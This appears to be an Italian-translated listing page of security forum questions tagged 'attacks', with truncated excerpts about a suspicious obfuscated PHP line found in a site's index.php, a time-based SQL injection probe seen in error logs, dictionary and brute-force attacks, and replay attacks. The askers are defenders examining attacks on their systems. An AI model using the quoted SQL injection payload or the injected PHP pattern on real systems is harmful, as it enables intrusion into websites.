Domande con tag 'attacks'

4
risposte
5
risposte

Trovato file PHP sospetto e offuscato. È un tentativo di hacking sul mio sito web? [duplicare]

Ho appena notato che la riga superiore del mio file index.php è stata cambiata in ciò che è di seguito. <?php preg_replace("\xf4\x30\x1f\x161\x42\x45"^"\xd7\xf2","3\x495\xa92\xc0\x7217057\xb43\x6c\x69\x6d\x722\xe17\x67\x86\xc77\x640\x31\x...
posta 17.02.2016 - 18:17
7
risposte

Iniezione SQL: perché le citazioni di escape non sono più sicure?

SQL raw Quando scrivi SQL - per tutto ciò che richiede veramente input umani, sono state fatte molte cose per evitare l'iniezione. Tutti quelli che hanno sentito parlare di SQL injection sanno che (sto per usare PHP come esempio) fare qual...
posta 06.05.2011 - 16:44
5
risposte

Può semplicemente decomprimere un'immagine JPEG per attivare un exploit?

Il romanzo Demone viene spesso elogiato per essere realistico nel suo ritratto piuttosto che come semplice parola d'ordine. Tuttavia, questo mi è sembrato irrealistico: Gragg's e-mail contained a poisoned JPEG of the brokerage logo. JP...
posta 26.08.2015 - 21:00
5
risposte

Servizio Web HTTPS passato a HTTP. Cosa può andare storto?

Recentemente ho visitato un sito Web che aveva una connessione HTTPS. Ora ha solo una semplice connessione HTTP e il metodo di autenticazione è cambiato da utente + password a "autenticarsi con l'account Google". Li ho contattati e ho chiesto...
posta 18.04.2016 - 19:44
10
risposte

Dove posso trovare buoni dizionari per gli attacchi con il dizionario?

Mi chiedo dove posso trovare una buona collezione di dizionari che possono essere usati per gli attacchi di dizionario? Ne ho trovate alcune tramite Google, ma sono interessato a sapere da dove ottieni i tuoi dizionari.     
posta 29.12.2010 - 16:24
2
risposte

Si tratta di un tentativo di iniezione SQL?

Esaminando i log degli errori ho trovato molte richieste a un'app web in cui l'URL contiene: /if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/ Ho letto che potrebbe essere u...
posta 03.08.2015 - 11:35
1
risposta

Le richieste crittografate SSL sono vulnerabili agli attacchi di riproduzione?

Le richieste crittografate SSL sono vulnerabili agli attacchi di riproduzione? Se sì, quali sono le buone opzioni per impedirlo?     
posta 12.09.2012 - 20:22
7
risposte

Come vengono utilizzate le GPU negli attacchi a forza bruta?

Ho letto che le GPU possono essere utilizzate in attacchi a forza bruta? Ma come si può fare e c'è bisogno di altri dispositivi hardware (hard disk, per esempio)? Nota: sono più interessato alla sicurezza delle applicazioni web, ma non voglio...
posta 21.03.2016 - 20:50
3
risposte

Che tipo di attacco è impedito dal codice di errore di Apache2 AH02032 ("Nome host fornito tramite SNI e nome host fornito via HTTP sono diversi")?

Ho visto nel mio server Apache2 dei messaggi come [ssl:error] [pid 28482] AH02032: Hostname xxx.yyy.zzz.www:443 provided via SNI and hostname xxx.yyy.zzz.www provided via HTTP are different Uno di questi messaggi di errore è stato attivato...
posta 16.08.2016 - 15:16